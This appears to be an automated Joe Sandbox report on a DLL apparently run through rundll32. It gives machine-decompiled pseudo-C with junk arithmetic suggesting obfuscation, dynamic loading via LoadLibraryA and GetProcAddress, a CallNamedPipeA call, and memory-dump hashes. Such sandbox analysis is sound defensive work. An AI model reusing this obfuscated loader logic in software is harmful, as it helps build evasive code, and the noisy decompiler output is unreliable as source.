                          				_t259 = _t258 - 0x90;
                          				r12d =  *(_t259 + 0x100);
                          				r10d = __rdx + 0x354;
                          				_t239 =  *((intOrPtr*)(_t259 + 0xf0));
                          				r15d = r9d;
                          				 *(_t259 + 0x74) = __rdx - 0x3595;
                          				r13d = __rax - 0x228c;
                          				 *(_t259 + 0xf8) = __edx + 0xfffff21d;
                          				r11d = _t271 + 0x14c1;
                          				 *((intOrPtr*)(_t259 + 0x78)) =  *(_t259 + 0xf8) + 0x522;
                          				r14d = _t277 - 0x12f1;
                          				 *(_t259 + 0x7c) = r11d;
                          				 *(_t259 + 0x108) = _t277 - 0x145b;
                          				 *(_t259 + 0x80) = r14d;
                          				r9d = __rax - 0x11a9;
                          				r8d = __rax - 0x923;
                          				 *(_t259 + 0xd8) = r9d;
                          				 *(_t259 + 0x70) = r8d;
                          				_t206 = __rax - 0x11a9;
                          				 *((intOrPtr*)(_t259 + 0x84)) = _t206;
                          				 *(_t259 + 0x110) = __rax + 0x984;
                          				if (r14d - _t256 + 0x106 < 0) goto 0x8c08a261;
                          				if (r15d == _t275 + 0x1663) goto 0x8c08a261;
                          				_t239[0xac] = _t239[0x11e];
                          				r10d = r10d - 0x283;
                          				r8d = 0x343a;
                          				r9d = 0x329d;
                          				 *(_t259 + 0x88) = r10d;
                          				 *(_t259 + 0x50) = 0x8c0a8090;
                          				 *(_t259 + 0x48) = 0x7d;
                          				 *(_t259 + 0x40) = 0x1a;
                          				 *(_t259 + 0x38) =  *((intOrPtr*)(_t239[0xe4] + 0x130)) - 0x23ef;
                          				 *(_t259 + 0x30) = 0x1e0;
                          				 *(_t259 + 0x28) = 0x3666;
                          				 *(_t259 + 0x20) = _t239;
                          				_t143 = E00007FF87FF88C08F290(0x27ae, 0x343a, _t239, _t250, __r8, __r9, _t277, _t275, _t273, _t271, _t250);
                          				r9d =  *(_t259 + 0xf8);
                          				r8d =  *(_t259 + 0x110);
                          				r11d = _t253 - 0x1956;
                          				r12d = _t250 + 0x1309;
                          				r10d = _t273 + 0x23f6;
                          				r14d = _t273 + 0x30d5;
                          				_t239[0x11e] = _t143;
                          				 *((intOrPtr*)(_t259 + 0x68)) = _t256 + 0x19bd;
                          				 *((intOrPtr*)(_t259 + 0x60)) = _t250 + 0x165d;
                          				r15d = r15d + 0xfffffbb6;
                          				 *(_t259 + 0x58) = r10d;
                          				r9d = r9d + 0xfffffc44;
                          				 *(_t259 + 0x50) = r11d;
                          				r8d = r8d + 0xfffff9e1;
                          				 *(_t259 + 0x48) =  *(_t259 + 0x74) + 0x3189;
                          				 *(_t259 + 0x40) =  *((intOrPtr*)(_t259 + 0x78)) + 0x9db;
                          				 *(_t259 + 0x38) = _t206 + 0x1669;
                          				 *(_t259 + 0x30) = r14d;
                          				 *(_t259 + 0x28) = _t239;
                          				 *(_t259 + 0x20) = r15d;
                          				_t145 = E00007FF87FF88C0790B0(0x8c0a8090, _t239, _t241, _t246, __r8, __r11);
                          				r14d =  *(_t259 + 0x80);
                          				r8d =  *(_t259 + 0x74);
                          				r11d =  *(_t259 + 0x108);
                          				r8d = r8d + 0x27b2;
                          				r9d =  *(_t259 + 0x70);
                          				r11d =  &(r11d[0x9ed]);
                          				r10d = _t275 + 0x119f;
                          				 *(_t259 + 0xf8) = _t145;
                          				r9d = r9d + 0xfffff951;
                          				 *(_t259 + 0x48) = _t273 + 0x38e9;
                          				 *(_t259 + 0x40) = r8d;
                          				_t262 = _t239;
                          				 *(_t259 + 0x38) = r12d;
                          				 *(_t259 + 0x30) = r10d;
                          				 *(_t259 + 0x28) = r11d;
                          				 *(_t259 + 0x20) =  *((intOrPtr*)(_t259 + 0x78)) + 0xf39;
                          				E00007FF87FF88C072390(0x8c0a8090, _t239, _t241, _t246, _t262, _t265, _t271);
                          				r8d =  *(_t259 + 0x70);
                          				r9d =  *(_t259 + 0xd8);
                          				r12d =  *(_t259 + 0x100);
                          				r15d =  *(_t259 + 0xe8);
                          				r11d =  *(_t259 + 0x7c);
                          				r10d =  *(_t259 + 0x88);
                          				if (r12d - _t273 + 0x27b2 >= 0) goto 0x8c08a3c0;
                          				if (r13d - _t271 + 0x216 >= 0) goto 0x8c08a31a;
                          				r11d = _t250 + 0x526;
                          				r10d = _t262 - 0x526;
                          				 *((intOrPtr*)(_t259 + 0x60)) = _t267 - 0x3c9;
                          				_t205 =  &(_t262[0x644]);
                          				 *(_t259 + 0x58) = r10d;
                          				r15d = _t241 + 0x11ae;
                          				 *(_t259 + 0x50) = r11d;
                          				_t199 =  *((intOrPtr*)(_t259 + 0xd0)) + 0x44a;
                          				 *(_t259 + 0x48) = _t239;
                          				_t209 =  *((intOrPtr*)(_t259 + 0x84)) + 0x4ca;
                          				 *(_t259 + 0x40) = _t199;
                          				r14d = r14d + 0xcdf;
                          				 *(_t259 + 0x38) = _t205;
                          				r9d = r9d + 0x4ca;
                          				 *(_t259 + 0x30) = _t209;
                          				r8d = r8d + 0xfffffde6;
                          				 *(_t259 + 0x28) = r14d;
                          				 *(_t259 + 0x20) = r15d;
                          				E00007FF87FF88C0875E0(0x8c0a8090, _t241, _t246);
                          				goto 0x8c08a47d;
                          				_t242 = _t239[0x80];
                          				if (_t242 != ( *(_t259 + 0xd8) + 0x66c) * _t239[0xf0]) goto 0x8c08a340;
                          				_t211 = _t209 & _t239[0xf0] & 0x00003189;
                          				r12d = r12d + _t211;
                          				_t248 = _t239[0x114] & r9d;
                          				if (r13d - _t248 < 0) goto 0x8c08a47d;
                          				if (_t239[0x48] - (r15d | _t242) <= 0) goto 0x8c08a39c;
                          				r12d = r12d - (r15d | 0x000027b2);
                          				 *_t239 =  *_t239 - _t242;
                          				_t239[0x20] = _t239[0x20] - (_t239[0x88] - 0x000023f6 &  *_t239);
                          				goto 0x8c08a3af;
                          				_t239[0xc] = _t239[0xc] ^ _t205 * _t239[0xc4] + _t239[0x3c];
                          				r13d = r13d + 2;
                          				if (r13d - _t248 >= 0) goto 0x8c08a366;
                          				goto 0x8c08a47d;
                          				if (_t239[0x10c] - _t242 >= 0) goto 0x8c08a47d;
                          				r12d =  *(_t259 + 0x70);
                          				asm("o16 nop [eax+eax]");
                          				 *(_t259 + 0x20) = _t239[0x98] | 0x0000228c;
                          				r9d = (_t239[0xa8] & 0x0000ffff) * ( *_t239 & 0x0000ffff) & 0x0000ffff;
                          				r9d = r9d * (r11w & 0xffffffff);
                          				r8d = _t239[0xc4] * r12d * 0x30d5;
                          				CallNamedPipeA(_t253, _t256, ??, ??, ??);
                          				r11d =  *(_t259 + 0x7c);
                          				if (_t199 + 1 - (_t239[0x20] - 0x23f6) * _t211 < 0) goto 0x8c08a3f0;
                          				r12d =  *(_t259 + 0x100);
                          				return _t271 + 0xb3d;
                          			}





























                          0x7ff88c089f80
                          0x7ff88c089f80
                          0x7ff88c089f80
                          0x7ff88c089f80
                          0x7ff88c089f80
                          0x7ff88c089f85
                          0x7ff88c089f8a
                          0x7ff88c089f99
                          0x7ff88c089fad
                          0x7ff88c089fb5
                          0x7ff88c089fbc
                          0x7ff88c089fc4
                          0x7ff88c089fcd
                          0x7ff88c089fd1
                          0x7ff88c089fd8
                          0x7ff88c089fe4
                          0x7ff88c089fec
                          0x7ff88c089ff0
                          0x7ff88c08a005
                          0x7ff88c08a00a
                          0x7ff88c08a011
                          0x7ff88c08a019
                          0x7ff88c08a020
                          0x7ff88c08a027
                          0x7ff88c08a036
                          0x7ff88c08a03b
                          0x7ff88c08a047
                          0x7ff88c08a054
                          0x7ff88c08a05e
                          0x7ff88c08a06e
                          0x7ff88c08a080
                          0x7ff88c08a087
                          0x7ff88c08a095
                          0x7ff88c08a098
                          0x7ff88c08a09e
                          0x7ff88c08a0b3
                          0x7ff88c08a0be
                          0x7ff88c08a0c3
                          0x7ff88c08a0c8
                          0x7ff88c08a0d1
                          0x7ff88c08a0d9
                          0x7ff88c08a0e1
                          0x7ff88c08a0e6
                          0x7ff88c08a0eb
                          0x7ff88c08a0f9
                          0x7ff88c08a101
                          0x7ff88c08a10f
                          0x7ff88c08a11a
                          0x7ff88c08a125
                          0x7ff88c08a12c
                          0x7ff88c08a144
                          0x7ff88c08a14e
                          0x7ff88c08a152
                          0x7ff88c08a159
                          0x7ff88c08a15e
                          0x7ff88c08a165
                          0x7ff88c08a16a
                          0x7ff88c08a171
                          0x7ff88c08a17b
                          0x7ff88c08a182
                          0x7ff88c08a186
                          0x7ff88c08a18b
                          0x7ff88c08a190
                          0x7ff88c08a195
                          0x7ff88c08a19a
                          0x7ff88c08a1a2
                          0x7ff88c08a1a7
                          0x7ff88c08a1af
                          0x7ff88c08a1b6
                          0x7ff88c08a1bb
                          0x7ff88c08a1c9
                          0x7ff88c08a1db
                          0x7ff88c08a1ef
                          0x7ff88c08a1f6
                          0x7ff88c08a200
                          0x7ff88c08a205
                          0x7ff88c08a208
                          0x7ff88c08a20d
                          0x7ff88c08a212
                          0x7ff88c08a217
                          0x7ff88c08a21b
                          0x7ff88c08a220
                          0x7ff88c08a227
                          0x7ff88c08a22f
                          0x7ff88c08a23e
                          0x7ff88c08a24d
                          0x7ff88c08a259
                          0x7ff88c08a26b
                          0x7ff88c08a27c
                          0x7ff88c08a289
                          0x7ff88c08a2a5
                          0x7ff88c08a2ac
                          0x7ff88c08a2b0
                          0x7ff88c08a2b7
                          0x7ff88c08a2bc
                          0x7ff88c08a2c3
                          0x7ff88c08a2c8
                          0x7ff88c08a2ce
                          0x7ff88c08a2d3
                          0x7ff88c08a2d9
                          0x7ff88c08a2dd
                          0x7ff88c08a2e4
                          0x7ff88c08a2e8
                          0x7ff88c08a2ef
                          0x7ff88c08a2f3
                          0x7ff88c08a2fa
                          0x7ff88c08a30b
                          0x7ff88c08a310
                          0x7ff88c08a315
                          0x7ff88c08a31a
                          0x7ff88c08a32f
                          0x7ff88c08a337
                          0x7ff88c08a33d
                          0x7ff88c08a34a
                          0x7ff88c08a353
                          0x7ff88c08a369
                          0x7ff88c08a373
                          0x7ff88c08a390
                          0x7ff88c08a396
                          0x7ff88c08a39a
                          0x7ff88c08a3ab
                          0x7ff88c08a3af
                          0x7ff88c08a3b9
                          0x7ff88c08a3bb
                          0x7ff88c08a3dc
                          0x7ff88c08a3e2
                          0x7ff88c08a3ea
                          0x7ff88c08a41d
                          0x7ff88c08a422
                          0x7ff88c08a42a
                          0x7ff88c08a443
                          0x7ff88c08a44a
                          0x7ff88c08a45e
                          0x7ff88c08a46f
                          0x7ff88c08a475
                          0x7ff88c08a49f

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: CallNamedPipe
                          • String ID: f6$}
                          • API String ID: 1741058652-3232957126
                          • Opcode ID: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                          • Instruction ID: f3160b77f50d1c060eb03e7454eff4a5ebd391b80e3aa2ab6cc31718271802d4
                          • Opcode Fuzzy Hash: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                          • Instruction Fuzzy Hash: 82D17C736196C58BD724CF15E4447EABBA4F388788F148129EB8917B58DB7CEA45CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00007FF87FF88C074820(long long __rax, long long __rbx, void* __rcx, void* __r8, void* __r9, void* __r10) {
                          				void* __rsi;
                          				void* __rbp;
                          				void* __r13;
                          				void* __r15;
                          				signed int _t132;
                          				signed int _t134;
                          				signed int _t168;
                          				signed int _t183;
                          				signed int _t188;
                          				signed int _t190;
                          				signed int _t200;
                          				signed long long _t217;
                          				signed int _t219;
                          				signed long long _t223;
                          				signed long long _t226;
                          				void* _t235;
                          				void* _t237;
                          				void* _t239;
                          				void* _t241;
                          				void* _t242;
                          				void* _t244;
                          				void* _t247;
                          				void* _t248;
                          				long long _t249;
                          				void* _t251;
                          				void* _t253;
                          				signed int _t254;
                          				void* _t256;
                          				CHAR* _t258;
                          				signed long long _t259;
                          
                          				_t247 = __r10;
                          				_t246 = __r9;
                          				_t244 = __r8;
                          				_t221 = __rcx;
                          				_t218 = __rbx;
                          				 *((long long*)(_t241 + 0x10)) = __rbx;
                          				 *(_t241 + 0x20) = r9d;
                          				_push(_t239);
                          				_push(_t237);
                          				_push(_t235);
                          				_push(_t251);
                          				_push(_t253);
                          				_push(_t256);
                          				_t242 = _t241 - 0x80;
                          				r10d = __r9 - 0x3666;
                          				r12d =  *(_t242 + 0xf8);
                          				r14d = __r9 - 0x22c;
                          				 *(_t242 + 0xc0) = r10d;
                          				r8d =  *(_t242 + 0xe8);
                          				_t9 = _t221 - 0x27b2; // 0x0
                          				r8d = r8d + 0xffffee57;
                          				 *(_t242 + 0xd0) = _t9;
                          				 *(_t242 + 0x68) = r8d;
                          				r9d = __rax + 0x1563;
                          				r12d = r12d + 0x984;
                          				r13d = __rax - 0x2103;
                          				 *(_t242 + 0xe8) = r9d;
                          				_t132 = __r10 + 0x23f6;
                          				 *(_t242 + 0x60) = _t132;
                          				if (r9d - _t132 <= 0) goto 0x8c074ab2;
                          				r8d = _t256 - 0x2b1;
                          				r10d = r10d + 0x37e1;
                          				r11d = _t253 + 0x38e9;
                          				_t254 =  *((intOrPtr*)(_t242 + 0x118));
                          				_t21 = _t239 + 0x2598; // 0x2598
                          				 *(_t242 + 0x48) = _t21;
                          				 *(_t242 + 0x40) = _t235 - 0x44a;
                          				r15d = _t256 - 0x11ae;
                          				 *(_t242 + 0x38) = r8d;
                          				_t27 = _t239 + 0x228c; // 0x228c
                          				r9d = _t27;
                          				 *(_t242 + 0x30) = r10d;
                          				 *(_t242 + 0x28) = r15d;
                          				 *(_t242 + 0x20) = r11d;
                          				_t134 = E00007FF87FF88C08AA10(__rax, __rcx, _t254, __r8, __r9, _t258);
                          				r8d =  *(_t242 + 0xe8);
                          				r10d = _t251 - 0x278;
                          				r12d =  *(_t242 + 0xd0);
                          				_t168 = __rbx - 0x150e;
                          				 *(_t242 + 0x50) = _t168;
                          				r14d = _t134;
                          				 *(_t242 + 0x48) = _t168;
                          				 *(_t242 + 0x40) = _t134 + 0xfffffa6f;
                          				r9d = _t251 + 0x27ae;
                          				r11d = _t237 + 0x189;
                          				 *(_t242 + 0x38) =  *(_t242 + 0x60);
                          				_t200 = _t237 + 0x495;
                          				 *(_t242 + 0x30) = r10d;
                          				 *(_t242 + 0x28) = r11d;
                          				r8d = r8d + 0x283;
                          				 *(_t242 + 0x20) = _t254;
                          				 *(_t242 + 0xf8) = __rbx + 0xf39 - 0x145b;
                          				E00007FF87FF88C077120( *(_t242 + 0x100), __rax, __rcx, _t254, __r8, __r9, _t247, _t248);
                          				LoadLibraryA(_t258);
                          				r10d = __rbx + 0x2ad;
                          				r11d = _t251 + 0x37e1;
                          				 *(_t242 + 0x50) = _t200;
                          				 *((long long*)(_t254 + 0x268)) = __rax;
                          				_t58 = _t237 + 0x1270; // 0x1270
                          				_t188 = _t58;
                          				_t60 = _t256 + 0x81; // 0x81
                          				r8d = _t60;
                          				 *((intOrPtr*)(_t254 + 0x120)) =  *((intOrPtr*)(_t254 + 0x120)) + ( *(_t254 + 0x1e0) | 0x0000343a);
                          				r9d = r15d;
                          				 *(_t242 + 0x48) = _t251 + 0x329d;
                          				 *(_t242 + 0x40) = r10d;
                          				 *(_t242 + 0x38) = r11d;
                          				 *(_t242 + 0x30) = _t235 + 0x1011;
                          				 *(_t242 + 0x28) = _t188;
                          				 *(_t242 + 0x20) = _t254;
                          				E00007FF87FF88C072730( *(_t254 + 0x1e0) | 0x0000343a, __rbx, _t254 + 0x160, _t237, _t244);
                          				r8d =  *(_t242 + 0xd8);
                          				_t71 = _t256 - 0x1270; // -4720
                          				r10d =  *(_t242 + 0xc0);
                          				 *(_t242 + 0x48) = r8d;
                          				_t75 = _t256 - 0xeb4; // -3764
                          				r11d = _t75;
                          				 *(_t242 + 0x40) = _t71;
                          				_t77 = _t237 + 0xcdf; // 0xcdf
                          				r9d = _t77;
                          				 *(_t242 + 0x38) = _t251 + 0x2103;
                          				r10d = r10d + 0x3a59;
                          				 *(_t242 + 0x30) = r10d;
                          				 *(_t242 + 0x28) = r11d;
                          				 *(_t242 + 0x20) = _t244 + 0x3f3;
                          				E00007FF87FF88C071000( *(_t254 + 0x1e0) | 0x0000343a, _t218, _t254 + 0x160, _t237, _t254, _t246);
                          				goto 0x8c074c65;
                          				_t219 =  *((intOrPtr*)(_t242 + 0x118));
                          				_t259 = r12d;
                          				if ( *((intOrPtr*)(_t219 + 0x80)) -  *(_t219 + 0x48) * _t259 > 0) goto 0x8c074ae9;
                          				if (r12d - (r8d & r12d) > 0) goto 0x8c074ae9;
                          				_t223 = r10d;
                          				 *(_t242 + 0x60) = _t223;
                          				if (_t259 - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^ _t223) > 0) goto 0x8c074c5f;
                          				_t183 = r9d ^ r12d;
                          				 *(_t242 + 0xd8) = _t183;
                          				_t249 = r9d * 0x36e7;
                          				 *((long long*)(_t242 + 0x70)) = _t249;
                          				 *(_t242 + 0x100) = r14d | 0x00001f2c;
                          				asm("o16 nop [eax+eax]");
                          				r8d = r8d *  *(_t219 + 0x40);
                          				_t217 =  *(_t219 + 0xc8) + _t249;
                          				r11d =  *(_t219 + 0x1c0);
                          				r11d = r11d + 0x1f2c;
                          				_t226 = r13d & _t259 ^ _t217;
                          				_t190 = _t188 * ( *(_t219 + 0x120) * r12d +  *((intOrPtr*)(_t219 + 0x60))) | r14d -  *((intOrPtr*)(_t219 + 0x110));
                          				 *(_t219 + 0xc8) = _t226;
                          				 *(_t242 + 0xf8) = _t190;
                          				r13d = r13d |  *(_t219 + 0x188) | _t183;
                          				r10d = _t217 + _t226;
                          				r9d =  *(_t242 + 0x100);
                          				 *(_t242 + 0x48) = ( *(_t219 + 0x1b8) | 0x0000343a) & r9d;
                          				r9d = r9d & _t200;
                          				 *(_t242 + 0x40) = _t219;
                          				 *(_t242 + 0x38) = r10d;
                          				 *(_t242 + 0x30) = r11d;
                          				 *(_t242 + 0x28) = _t190 &  *(_t219 + 0x150) & 0x00002032;
                          				 *(_t242 + 0x20) = r10d -  *((intOrPtr*)(_t219 + 0x218));
                          				E00007FF87FF88C0898F0(_t254 + 0x00003a59 & r14d, _t217, _t254, _t254, _t246, _t254);
                          				r12d = r12d + 4;
                          				 *(_t219 + 0x150) =  *(_t219 + 0x150) + _t226 - ( *(_t219 + 0xd8) ^  *(_t219 + 0x30));
                          				r9d =  *(_t242 + 0xe8);
                          				r10d =  *(_t242 + 0xc0);
                          				r8d =  *(_t242 + 0x68);
                          				if (r12d - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^  *(_t242 + 0x60)) <= 0) goto 0x8c074b40;
                          				goto 0x8c074c65;
                          				_t129 = _t239 + 0x3595; // 0x3595
                          				return _t129;
                          			}

































                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074825
                          0x7ff88c07482a
                          0x7ff88c07482b
                          0x7ff88c07482c
                          0x7ff88c07482d
                          0x7ff88c07482f
                          0x7ff88c074831
                          0x7ff88c074835
                          0x7ff88c074843
                          0x7ff88c07484a
                          0x7ff88c074852
                          0x7ff88c07485c
                          0x7ff88c074864
                          0x7ff88c07486c
                          0x7ff88c074872
                          0x7ff88c074879
                          0x7ff88c074883
                          0x7ff88c074888
                          0x7ff88c07488f
                          0x7ff88c074896
                          0x7ff88c07489d
                          0x7ff88c0748a5
                          0x7ff88c0748ac
                          0x7ff88c0748b9
                          0x7ff88c0748bf
                          0x7ff88c0748c6
                          0x7ff88c0748cd
                          0x7ff88c0748d4
                          0x7ff88c0748dc
                          0x7ff88c0748e2
                          0x7ff88c0748ec
                          0x7ff88c0748f0
                          0x7ff88c0748f7
                          0x7ff88c0748fc
                          0x7ff88c0748fc
                          0x7ff88c074903
                          0x7ff88c07490e
                          0x7ff88c074919
                          0x7ff88c07491e
                          0x7ff88c074923
                          0x7ff88c07492b
                          0x7ff88c074933
                          0x7ff88c074948
                          0x7ff88c07494e
                          0x7ff88c074952
                          0x7ff88c074955
                          0x7ff88c07495e
                          0x7ff88c074962
                          0x7ff88c07496e
                          0x7ff88c074975
                          0x7ff88c074979
                          0x7ff88c07497f
                          0x7ff88c07498a
                          0x7ff88c07498f
                          0x7ff88c074998
                          0x7ff88c07499f
                          0x7ff88c0749a6
                          0x7ff88c0749b4
                          0x7ff88c0749c1
                          0x7ff88c0749cf
                          0x7ff88c0749d7
                          0x7ff88c0749e1
                          0x7ff88c0749e8
                          0x7ff88c0749e8
                          0x7ff88c0749f5
                          0x7ff88c0749f5
                          0x7ff88c074a08
                          0x7ff88c074a1d
                          0x7ff88c074a20
                          0x7ff88c074a24
                          0x7ff88c074a29
                          0x7ff88c074a2e
                          0x7ff88c074a32
                          0x7ff88c074a36
                          0x7ff88c074a3b
                          0x7ff88c074a40
                          0x7ff88c074a48
                          0x7ff88c074a4f
                          0x7ff88c074a5f
                          0x7ff88c074a64
                          0x7ff88c074a64
                          0x7ff88c074a6b
                          0x7ff88c074a6f
                          0x7ff88c074a6f
                          0x7ff88c074a7d
                          0x7ff88c074a81
                          0x7ff88c074a8f
                          0x7ff88c074a97
                          0x7ff88c074a9c
                          0x7ff88c074aa0
                          0x7ff88c074aad
                          0x7ff88c074ab2
                          0x7ff88c074aba
                          0x7ff88c074acc
                          0x7ff88c074ad7
                          0x7ff88c074af4
                          0x7ff88c074afa
                          0x7ff88c074b02
                          0x7ff88c074b12
                          0x7ff88c074b15
                          0x7ff88c074b1c
                          0x7ff88c074b27
                          0x7ff88c074b2c
                          0x7ff88c074b37
                          0x7ff88c074b4a
                          0x7ff88c074b4f
                          0x7ff88c074b52
                          0x7ff88c074b5c
                          0x7ff88c074b66
                          0x7ff88c074b72
                          0x7ff88c074b74
                          0x7ff88c074b85
                          0x7ff88c074b92
                          0x7ff88c074bad
                          0x7ff88c074bc9
                          0x7ff88c074bd1
                          0x7ff88c074bd5
                          0x7ff88c074bd8
                          0x7ff88c074bdd
                          0x7ff88c074be2
                          0x7ff88c074be7
                          0x7ff88c074beb
                          0x7ff88c074bef
                          0x7ff88c074bfb
                          0x7ff88c074c12
                          0x7ff88c074c2b
                          0x7ff88c074c33
                          0x7ff88c074c3b
                          0x7ff88c074c52
                          0x7ff88c074c5d
                          0x7ff88c074c5f
                          0x7ff88c074c7f

                          APIs
                          • LoadLibraryA.KERNEL32 ref: 00007FF88C0749B4
                            • Part of subcall function 00007FF88C072730: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00001270,00007FF88C074A40), ref: 00007FF88C07285E
                            • Part of subcall function 00007FF88C071000: GetProcAddress.KERNEL32 ref: 00007FF88C0710D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: 62 $662
                          • API String ID: 2238633743-980518382
                          • Opcode ID: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                          • Instruction ID: 42ea4e64debd84b0d3d4b220fab369ae37b6f1b73b3d2f1d48e9ede23fc55d6b
                          • Opcode Fuzzy Hash: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                          • Instruction Fuzzy Hash: 16B18C776186C5CBD765CF24E484BDABBA4F788788F004125EB8A57B58DB38EA54CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.405784597.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000006.00000002.405761108.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405829932.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405874359.00007FF88C0A8000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405912361.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000006.00000002.405939935.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_7ff88c070000_rundll32.jbxd
                          Similarity
                          • API ID: FileHandleType
                          • String ID: @
                          • API String ID: 3000768030-2766056989
                          • Opcode ID: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                          • Instruction ID: 272737084f694f5981accc06e7611bf55abec3b8f15265785a7cfa3449f673c9
                          • Opcode Fuzzy Hash: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                          • Instruction Fuzzy Hash: C4212D62A18B4241EF748B2AE8901392691FB47BF8F345335D6AE077DCCF29E881D241
                          Uniqueness

                          Uniqueness Score: -1.00%